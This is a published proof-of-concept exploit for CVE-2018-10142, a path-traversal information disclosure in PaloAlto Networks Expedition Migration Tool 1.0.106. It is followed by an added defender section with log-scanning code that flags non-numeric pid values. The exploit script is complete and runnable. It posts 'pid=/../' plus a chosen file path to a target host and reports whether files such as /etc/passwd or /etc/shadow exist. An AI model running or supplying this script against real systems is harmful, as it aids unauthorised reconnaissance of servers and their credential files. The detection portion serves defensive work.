PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure
Source: https://www.criticalstart.com Author: ParagonSec Published: 2018-12-04
# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure
# Date: 2018-11-28
# Exploit Author: paragonsec @ Critical Start
# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool
# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8
# Version: 1.0.106
# Tested on: Linux
# CVE : 2018-10142
 
#!/usr/bin/env python
 
import argparse
import requests
import sys
import collections
 
#Colors
OKRED = '\033[91m'
OKGREEN = '\033[92m'
ENDC = '\033[0m'
 
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)')
args = parser.parse_args()
 
# Check to ensure both arguments have been passed
if not args.rhost or not args.file:
    parser.print_help(sys.stderr)
    sys.exit(1)
 
rhost = args.rhost
rfile = args.file
 
exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php"
 
headers = [
    ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
    ('Accept', 'application/json, text/javascript, */*; q=0.01'),
    ('Accept-Language', 'en-US,en;q=0.5'),
    ('Accept-Encoding', 'gzip, deflate'),
    ('Connection', 'close')
]
 
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
 
# Setting up POST body parameters
body = "pid=/../" + rfile
 
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)")
print(OKGREEN + "CVE: " + ENDC + "2018-10142")
print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool")
print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n")
 
print(OKGREEN + "[+]" + ENDC + "Running exploit...")
 
req = requests.post(exploit_url, headers=headers, data=body)
if "false" not in req.text:
    print(OKGREEN + "[+]" + ENDC + "Exploit worked! " + rfile + " exists!\n")
else:
    print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n")
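
For defenders, the request shape in the proof-of-concept above (a request to /API/process/checkPidStatus.php whose pid value is a path rather than a process ID) can be matched in reverse-proxy or WAF logs that record request bodies. The following is an added example, not part of the original exploit or of Expedition itself; the numeric-only pid rule, the event tuple layout and the sample events are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Endpoint path and parameter name come from the proof-of-concept on this page.
ENDPOINT = "/API/process/checkPidStatus.php"
# Assumption: a legitimate pid value is a plain decimal process ID.
PID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_pids(path, body):
    """Return the URL-decoded pid values in one request that are not numeric."""
    target, _, query = path.partition("?")
    if target.lower() != ENDPOINT.lower():
        return []
    bad = []
    # Inspect both the query string and the form body for the parameter.
    for raw in (query, body):
        for name, value in parse_qsl(raw, keep_blank_values=True):
            if name == "pid" and not PID_RE.fullmatch(value):
                bad.append(value)
    return bad


def scan(events):
    """Group suspicious pid values by client address.

    events: iterable of (client, method, path, body) tuples
    (hypothetical record layout for a proxy that logs request bodies).
    """
    hits = defaultdict(list)
    for client, _method, path, body in events:
        for value in suspicious_pids(path, body):
            hits[client].append(value)
    return dict(hits)


# Constructed sample events, not captured traffic (documentation addresses).
SAMPLE_EVENTS = [
    ("192.0.2.10", "POST", ENDPOINT, "pid=4312"),
    ("198.51.100.7", "POST", ENDPOINT, "pid=/../etc/passwd"),
    ("198.51.100.7", "POST", ENDPOINT, "pid=/../etc/shadow"),
    ("192.0.2.10", "GET", ENDPOINT + "?pid=77", ""),
    ("203.0.113.5", "POST", "/API/other.php", "pid=/../etc/passwd"),
]

if __name__ == "__main__":
    for client, values in scan(SAMPLE_EVENTS).items():
        print(client, values)
```

The same allowlist check, applied server-side before the pid value is used, is the general mitigation pattern; the PoC header lists versions below 1.0.107 as vulnerable.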
 